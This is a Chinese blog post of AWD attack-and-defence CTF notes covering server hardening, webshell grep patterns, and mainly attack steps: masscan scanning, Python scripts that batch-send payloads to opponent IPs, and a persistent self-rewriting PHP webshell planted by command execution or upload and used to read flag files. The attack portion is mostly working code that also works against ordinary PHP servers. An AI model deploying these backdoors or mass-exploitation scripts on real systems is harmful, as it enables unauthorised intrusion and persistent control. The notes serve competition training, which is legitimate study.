AWD简单思路与学习笔记

第一次参加线下AWD比赛,思路太窄,手忙脚乱,通过其他大佬开源的AWD平台以及比赛的PHP环境整理一下简单的思路。

GitHub AWD平台地址:https://github.com/m0xiaoxi/AWD_CTF_Platform

加固思路:

1、登录服务器SSH
修改密码:passwd
2、下载源码并备份(FileZilla—Sftp—询问密码方式)
tar -czvf /tmp/html.tar.gz /var/www/html(压缩)
cd /tmp
tar -xzvf /tmp/html.tar.gz(解压)
cp -R /tmp/var/www/html/. /var/www/html/ (复制)
mysql dump -u root -p test(数据库名) > test.sql(备份数据库)
mysql -u root -p test(数据库名) < test.sql (还原数据库)
3、快速查找命令:
  • 上WAF或日志记录(若waf在web目录下需要删除掉waf文件的include)
find /var/www/html -name "*.php"|xargs sed -i "s#<?php#<?php\ninclude('/var/www/html/php_log.php');\n#g"
  • 快速查一下shell
find /var/www/html -name "*.php" |xargs egrep 'assert|eval|phpinfo\(\)|\(base64_decoolcode|shell_exec|passthru|file_put_contents\(\.\*\$|base64_decode\('
 
3、Webshell查杀(D盾):删除木马后门。
4、代码审计(seay):存在漏洞的变量直接写死等。
5、抓流量:tcpdump tcp -t -s 0 and port 80 -w /tmp/target.cap
-t : 不显示时间戳
-s 0 : 抓取数据包时默认抓取长度为68字节。加上-S 0 后可以抓到完整的数据包

攻击思路:

1、扫描攻击目标:sudo masscan --range 192.168.100.1-192.168.100.100 -Pn -p5000 -oX scan.xml
2、解析scan.xml到IP.txt
 1 import re
 2 
 3 ipaddr_re = "((25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)"
 4 ip_re = "addr=.*addrtype="
 5 port_re = "portid=.*><state"
 6 portnum_re = "[1-9]\d*"
 7 
 8 def readxml(path):
 9     with open(path, "r") as f:
10         list = []
11         for line in f.readlines():
12             line = line.strip('\n')  #去掉列表中每一个元素的换行符
13             if "addr=" in line:
14                 ip = re.search(ip_re, line).group()
15                 ip = re.search(ipaddr_re, ip).group()
16                 port = re.search(port_re, line).group()
17                 port = re.search(portnum_re, port).group()
18                 list.append([ip, port])
19         return list
20 
21 def writetxt(list):
22     with open("ip.txt", "w") as f:
23         for i in list:
24             ip_port = i[0] + ":" + i[1] +"\n"
25             f.write(ip_port)
26 
27 def main():
28     list = readxml("scan.xml")
29     writetxt(list)
30 
31 if __name__ == '__main__':
32     main()
View Code

3、burp抓取payload后批量攻击:

Burp插件copy as python-requests
Burp报文转换为Python requests库格式:
输出示例:
1 import requests
2 
3 burp0_url = "http://192.168.0.103:8801/config.php?a=system(%22ls%22);"
4 burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
5 burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
6 requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)

批量访问脚本,response写入result.txt中(由于写入不死马链接不会中断,无法访问下一个IP,建议加上timeout):
 1 import requests
 2 import re
 3 import time
 4 
 5 def IP(IP_path):
 6     IP_list = []
 7     with open(IP_path, "r") as f:
 8         for line in f.readlines():
 9             line = line.strip('\n')  #去掉列表中每一个元素的换行符
10             IP_list.append(line)
11     return IP_list
12 
13 def attack(IP_list):
14     result_list = []
15 
16     '''下面参数需要根据实际情况进行替换'''
17     burp0_url = "http://192.168.0.103:8801/images/.config.php?passwd=FPXtian"
18     burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
19     burp0_headers = {"Upgrade-Insecure-Requests": "1",
20                      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
21                      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
22                      "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
23     burp0_data = {"cmd": "system(\"cat ../../../../flag\");"}
24 
25     url = burp0_url.split("/")
26     for ip in IP_list:
27         url[2] = ip
28         burp0_url = "/".join(url)
29         print(burp0_url)
30         try:
31             '''下面语句需要根据实际情况进行替换,建议加上timeout'''
32             r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)
33 
34             if r.status_code == 200:
35                 result_list.append(ip + "\n")
36                 result_list.append(r.text + "\n")
37                 print(r.text)
38         except requests.exceptions.Timeout:
39             continue
40     return result_list
41 
42 def write(result_list):
43     with open("result.txt", "w") as f:
44         for line in result_list:
45             f.write(line)
46 
47 def main():
48     IP_list = IP("IP.txt")
49     result_list = attack(IP_list)
50     write(result_list)
51 
52 if __name__ == '__main__':
53     main()
View Code
4、通过默认后门批量种不死马:
命令执行写入不死马:
GET方式需要转换为url编码:
cmd=system('while%20true%3Bdo%20echo%20%5C'%3C%3Fphp%20if(md5(%24_GET%5Bpasswd%5D)%3D%3D%22139bdb983ee92a3624f2cc978f0cb3b7%22)%7B%40eval(%24_REQUEST%5Bcmd%5D)%3B%7D%20%3F%3E%5C'%20%3E.config.php%3Bsleep%200.1%3Bdone%3B')%3B
明文:
system('while true;do echo \'<?php if(md5($_GET[passwd])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>\' >.config.php;sleep 0.1;done;');
5、通过上传漏洞批量种不死马:
不死马.php:
 1 <?php
 2 ignore_user_abort(true);
 3 set_time_limit(0);
 4 unlink(__FILE__);
 5 $file = '.config.php';
 6 $code = '<?php if(md5($_GET["passwd"])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>';
 7 while (1){
 8     file_put_contents($file,$code);
 9     usleep(5000);
10 }
11 ?>
12 
13 //.config.php?passwd=FPXtian&cmd=system("ls");
6、通过不死马批量获取flag:
构造获取flag payload,使用插件copy as python-requests生成requests库的参数,替换至批量访问脚本中批量访问
7、批量提交flag:
 1 import requests
 2 import re
 3 import time
 4 
 5 # flag_re = "flag(.*)"
 6 flag_re = ".{32}"
 7 
 8 def flag(flag_path):
 9     flag_list = []
10     with open(flag_path, "r") as f:
11         for line in f.readlines():
12             line = line.strip('\n')  #去掉列表中每一个元素的换行符
13             if re.search(flag_re, line):
14                 flag = re.search(flag_re, line).group()
15                 flag_list.append(flag)
16     return flag_list
17 
18 def submit(flag_list):
19     for flag in flag_list:
20 
21         '''下面参数需要根据实际情况进行替换'''
22         burp0_url = "http://192.168.0.103:9090"
23         burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
24         burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
25                          "Origin": "http://192.168.0.103:9090", "Content-Type": "application/x-www-form-urlencoded",
26                          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
27                          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
28                          "Referer": "http://192.168.0.103:9090/?flag=1", "Accept-Encoding": "gzip, deflate",
29                          "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
30         burp0_data = {"flag": flag, "token": "4300f7f61934925694f6138f3045e61e"}
31 
32         try:
33             '''下面语句需要根据实际情况进行替换,建议加上timeout'''
34             r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)
35             if r.status_code == 200:
36                 print(flag, r.text)
37         except requests.exceptions.Timeout:
38             continue
39 
40 def main():
41     flag_list = flag("result.txt")
42     submit(flag_list)
43 
44 if __name__ == '__main__':
45     main()
View Code

后续防御与攻击思路:

1、分析流量:修复漏洞,或者直接通过其他队伍的攻击流量进行批量反打。
2、杀不死马:

1 while true
2 do
3 rm -f .config.php
4 done

posted @ 2020-10-08 15:21  VVVinson  阅读(1734)  评论(0编辑  收藏  举报